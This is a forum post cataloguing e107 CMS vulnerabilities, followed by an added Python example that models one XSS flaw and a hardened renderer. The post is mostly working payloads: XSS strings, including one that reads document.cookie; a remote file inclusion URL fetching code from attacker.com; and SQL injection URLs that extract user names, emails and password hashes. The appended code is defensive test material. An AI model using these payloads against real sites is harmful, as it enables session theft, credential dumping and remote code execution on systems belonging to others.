Multiple XSS in Chatbox, forum posts:
HTML code:
[img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email]/foo_at_bar.com"onmouseover="alert('Vulnerable');[/email]
[url]/url.htm" onmouseover="alert('Vulnerable');[/url]
e107 Subject field HTML injection Vulnerability
Code:
In Submit comment:
Subject: '><script>alert(/XSS/)</script>
0.545 & 0.603
e107 with the Chatbox.php (tagboard) module enabled. DoS.
In the Name inputbox of the Chatbox type:
Code:
<script = javascript> alert('DoS') <script>
6.*
HTML attachment:
Code:
<html>
<body>
<script>alert('VULN');</script>
</body>
</html>
XSS Vulnerability in "Netquery" (nquser.php) plugin.
Code:
GET http://virtech.org/e107/e107_plugins/netquery/nquser.php HTTP/1.0
Accept: */*
Referer: http://virtech.org/tools/
Accept-Language: en-us
Pragma: no-cache
User-Agent: <script>alert()</script>
Host: virtech.org
Proxy-Connection: Keep-Alive
Cookie: e107_tdOffset=32630; e107_tdSetTime=1159974893; e107_tzOffset=420
Content-length: 0
0.6.15
XSS in "user settings" (usersettings.php):
Code:
http://target/e107_0615/usersettings.php?avmsg=[xss code here]
XSS Vulnerability in "Clock Menu" (clock_menu.php) plugin.
Code:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Other RFI:
0.6.15
Code:
http://target/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Other SQL injection:
0.6.15
SQL injection bug in "news.php":
Code:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
SQL injection bug in "content.php":
Code:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*
Code:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
Last edited by ettee; 07.10.2007 at 14:48.
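
Added example, not part of the original post and not e107's code: a minimal Python model of the attribute breakout behind the four chatbox/forum BBCode strings above, next to a renderer that allowlists and escapes the tag body. The names `render_unsafe`, `render_safe`, `event_handlers` and the two allowlist patterns are hypothetical, and the flawed renderer is a simplified stand-in, not the actual e107 parser.

```python
import html
import re
from html.parser import HTMLParser

PAYLOADS = [  # the four BBCode strings quoted in the post, reused as test input
    "[img]/imgsrc.png' onmouseover='alert(\"Vulnerable\");[/img]",
    "[link]/link.htm\" onmouseover=\"alert('Vulnerable');[/link]",
    "[email]/foo_at_bar.com\"onmouseover=\"alert('Vulnerable');[/email]",
    "[url]/url.htm\" onmouseover=\"alert('Vulnerable');[/url]",
]
TAG_RE = re.compile(r"\[(img|link|email|url)\](.*?)\[/\1\]", re.I | re.S)
SAFE_URL = re.compile(r"(?:https?://|/)[^\s\"'<>`]*", re.I)  # assumed allowlist
SAFE_MAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+")  # assumed allowlist

def render_unsafe(text):
    """Stand-in for the flawed pattern: tag body pasted into an attribute verbatim."""
    def sub(m):
        tag, val = m.group(1).lower(), m.group(2)
        if tag == "img":
            return "<img src='%s'>" % val
        return '<a href="%s%s">%s</a>' % ("mailto:" if tag == "email" else "", val, val)
    return TAG_RE.sub(sub, text)

def render_safe(text):
    """Validate each tag body against an allowlist and HTML-escape everything emitted."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))   # text between tags
        tag, val = m.group(1).lower(), m.group(2).strip()
        esc = html.escape(val, quote=True)
        if not (SAFE_MAIL if tag == "email" else SAFE_URL).fullmatch(val):
            out.append(html.escape(m.group(0)))        # rejected: shown as inert text
        elif tag == "img":
            out.append('<img src="%s" alt="">' % esc)
        else:
            out.append('<a href="%s%s">%s</a>' % ("mailto:" if tag == "email" else "", esc, esc))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)

class _Attrs(HTMLParser):
    names = ()  # attribute names seen on start tags
    def handle_starttag(self, tag, attrs):
        self.names += tuple(name for name, _ in attrs)

def event_handlers(markup):  # on* attribute names an HTML parser sees in the markup
    p = _Attrs()
    p.feed(markup)
    return [n for n in p.names if n.startswith("on")]
```

Running `event_handlers` over the output of each renderer gives a regression check: the stand-in yields an `onmouseover` attribute for every string, the hardened renderer yields none.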